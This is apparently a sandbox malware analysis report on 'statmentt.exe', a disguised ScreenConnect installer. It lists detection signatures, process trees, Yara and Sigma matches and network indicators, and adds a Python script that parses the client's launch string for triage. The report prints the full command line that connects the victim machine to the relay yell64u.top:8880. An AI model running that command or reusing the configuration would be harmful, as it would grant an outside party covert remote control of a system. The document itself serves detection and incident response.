

Windows Analysis Report
statmentt.exe

Overview

General Information

Sample name: statmentt.exe
Analysis ID: 1578432
MD5: 054251d2e1de783b0faed842d64fd893
SHA1: 3e23d7c2777644dbe519b365d5e9cb80bfe3d402
SHA256: e1a3eb6e1ec31406443bfbe5067c1852706406a824a29c2490c8e1b73fcf0081
Tags: exe, user-malwarology

Detection

ScreenConnect Tool
Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 32
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • statmentt.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\statmentt.exe" MD5: 054251D2E1DE783B0FAED842D64FD893)
    • msiexec.exe (PID: 7468 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7500 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7568 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8DDF4D7DFA864A88ED87F00705A0EDAF C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7632 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6876625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7704 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6D5F870693EF3B6FD3A6AF241B788648 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7748 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B9FCDEB162140880EF803EB7EC0353E8 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7788 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7856 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "15e3aa5a-03ad-43c1-8c56-797fd84cc894" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 8012 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "5082607d-6583-424c-b175-f03711434b52" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
Yara matches: submitted file
Source | Rule | Description | Author
statmentt.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

Yara matches: dropped files
Source | Rule | Description | Author
C:\Config.Msi\68f19a.rbs | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
C:\Windows\Installer\MSIF458.tmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

Yara matches: memory dumps (5 further entries are collapsed in the original report)
Source | Rule | Description | Author
00000000.00000002.1802003851.0000000005B10000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
00000000.00000002.1785575924.0000000003251000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

Yara matches: unpacked PE files (4 further entries are collapsed in the original report)
Source | Rule | Description | Author
0.2.statmentt.exe.5b10000.9.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
8.2.ScreenConnect.WindowsClient.exe.24bfa20.0.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
8.0.ScreenConnect.WindowsClient.exe.a0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
0.0.statmentt.exe.c85db8.4.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security
0.2.statmentt.exe.5b10000.9.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security

                              System Summary

Source: Process started
Author: Florian Roth (Nextron Systems)
Data:
  Command: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c="
  CommandLine: (identical to Command)
  CommandLine|base64offset|contains: )^
  Image: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
  NewProcessName: (identical to Image)
  OriginalFileName: (identical to Image)
  ParentCommandLine: (empty)
  ParentImage: (empty)
  ParentProcessId: 620
  ProcessCommandLine: (identical to Command)
  ProcessId: 7788
  ProcessName: ScreenConnect.ClientService.exe
Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data:
  Details: ScreenConnect Client (de5851ad6e374ce3) Credential Provider
  EventID: 13
  EventType: SetValue
  Image: C:\Windows\System32\msiexec.exe
  ProcessId: 7500
  TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-406F-012C01771397}\(Default)
                              No Suricata rule has matched
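The launch string the Sigma rule matched on (the same one visible in the process tree for PID 7788) carries every indicator a responder needs from this sample: relay host and port, the session ID, the server's public key and the free-text custom properties. The parser below is an added example written for this report; it is not Joe Sandbox, ConnectWise or Sigma code. The meaning assigned to each parameter (e = session type, y = process type, h = relay host, p = relay port, s = session ID, k = base64 CryptoAPI PUBLICKEYBLOB of the server key, c = custom properties 1 to 8) is inferred from the parameter names and the observed behaviour and is an assumption, as are the "expected" relay ports and the approved host support.example.com used in the demo. The triage checks are my own and do not reproduce the Sigma rule's logic.

```python
import base64
import hashlib
import struct
from urllib.parse import parse_qs

# Launch string copied verbatim from the ScreenConnect.ClientService.exe
# command line in the process tree above (PID 7788).
LAUNCH_STRING = (
    "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e"
    "&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA"
    "&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c="
)

# Relay ports treated as expected: 443 for hosted instances and 8041, which I
# assume to be the on-prem ScreenConnect relay default. 8880 is neither.
EXPECTED_RELAY_PORTS = {443, 8041}


def parse_rsa_publickeyblob(blob):
    """Parse a CryptoAPI PUBLICKEYBLOB: BLOBHEADER, RSAPUBKEY, then the
    modulus, which CryptoAPI stores little-endian."""
    b_type, b_version, _reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    if b_type != 0x06:  # PUBLICKEYBLOB
        raise ValueError("not a PUBLICKEYBLOB: bType=0x%02x" % b_type)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", blob, 8)
    if magic != b"RSA1":
        raise ValueError("unexpected RSAPUBKEY magic %r" % magic)
    modulus = blob[20:20 + bitlen // 8]
    if len(modulus) != bitlen // 8:
        raise ValueError("truncated modulus")
    return {
        "version": b_version,
        "alg_id": alg_id,  # 0x0000A400 is CALG_RSA_KEYX
        "bits": bitlen,
        "exponent": pubexp,
        "modulus": int.from_bytes(modulus, "little"),
    }


def parse_launch_string(launch):
    """Split the launch string into named fields and decode the server key."""
    qs = parse_qs(launch.lstrip("?"), keep_blank_values=True)
    # parse_qs percent-decodes for us, so %2f / %2b in k are already '/' and '+'.
    blob = base64.b64decode(qs["k"][0], validate=True)
    key = parse_rsa_publickeyblob(blob)
    return {
        "session_type": qs["e"][0],
        "process_type": qs["y"][0],
        "relay_host": qs["h"][0],
        "relay_port": int(qs["p"][0]),
        "session_id": qs["s"][0],
        "custom_properties": qs.get("c", []),
        "server_key": key,
        # Assumption: k is the server's key, so every installer built on the
        # same server carries the same blob and this hash pivots between samples.
        "server_key_fingerprint": hashlib.sha256(blob).hexdigest(),
    }


def triage(fields, approved_relay_hosts):
    """Return the reasons this client looks suspicious. These checks are my
    own, not the logic of the Sigma rule that fired above."""
    findings = []
    if fields["session_type"] == "Access" and fields["process_type"] == "Guest":
        findings.append("unattended Access agent (installs ScreenConnect.ClientService as a service)")
    if fields["relay_host"] not in approved_relay_hosts:
        findings.append("relay host %s is not an approved ScreenConnect instance" % fields["relay_host"])
    if fields["relay_port"] not in EXPECTED_RELAY_PORTS:
        findings.append("non-standard relay port %d" % fields["relay_port"])
    props = [p for p in fields["custom_properties"] if p]
    if props:
        findings.append("free-text custom properties chosen by whoever built the installer: %r" % props)
    return findings


if __name__ == "__main__":
    parsed = parse_launch_string(LAUNCH_STRING)
    key = parsed["server_key"]
    print("relay %s:%d, session %s" % (parsed["relay_host"], parsed["relay_port"], parsed["session_id"]))
    print("server key RSA-%d e=%d sha256=%s" % (key["bits"], key["exponent"], parsed["server_key_fingerprint"]))
    # support.example.com is a hypothetical approved instance for the demo.
    for finding in triage(parsed, {"support.example.com"}):
        print(" -", finding)
```

On the string above this yields relay yell64u.top:8880, a 2048-bit RSA key with public exponent 65537, and the custom properties "IT" and "IT team"; the SHA-256 of the raw key blob is a cheap pivot for finding other installers built on the same server, and the relay host and session ID are the values to feed into DNS and proxy searches.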


                              AV Detection

Source: statmentt.exe; ReversingLabs: Detection: 21%
Source: Submitted sample; Integrated Neural Analysis Model: Matched 94.2% probability
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 7_2_040F0F08 CryptProtectData, 7_2_040F0F08
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 7_2_040F16F1 CryptProtectData, 7_2_040F16F1
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 7_2_05BE2F98 CryptUnprotectData, 7_2_05BE2F98
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 7_2_05BE13E4 CryptUnprotectData, 7_2_05BE13E4
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 7_2_05BE2EE0 CryptUnprotectData, 7_2_05BE2EE0
Source: C:\Users\user\Desktop\statmentt.exe; EXE: msiexec.exe

                              Compliance

Source: C:\Users\user\Desktop\statmentt.exe; EXE: msiexec.exe
Source: statmentt.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: statmentt.exe; Static PE information: certificate valid
Source: statmentt.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888572432.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statmentt.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statmentt.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statmentt.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statmentt.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1888442965.0000000001550000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1888844830.00000000015D2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statmentt.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1818911448.0000000000F6D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statmentt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1799483150.0000000004200000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statmentt.exe, 68f199.msi.2.dr, 68f19b.msi.2.dr, MSIF488.tmp.2.dr, MSIF739.tmp.2.dr, 68f19a.rbs.2.dr, MSIF458.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statmentt.exe, 68f199.msi.2.dr, MSIEC0B.tmp.1.dr, 68f19b.msi.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statmentt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888572432.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statmentt.exe
Source: C:\Windows\System32\msiexec.exe; File opened (drive letter enumeration, one event per letter): a:, b:, c:, e:, f:, g:, h:, i:, j:, k:, l:, m:, n:, o:, p:, q:, r:, s:, t:, u:, v:, w:, x:, y:, z:

                              Networking

Source: C:\Windows\System32\msiexec.exe; Registry value created: NULL Service
Source: global traffic; TCP traffic: 192.168.2.4:49731 -> 85.239.34.190:8880
Source: Joe Sandbox View; ASN Name: RAINBOW-HKRainbownetworklimitedHK
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: yell64u.top
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://ocsp.digicert.com0
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://ocsp.digicert.com0A
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.dr; String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000007.00000002.3028562442.0000000001C7A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr; String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
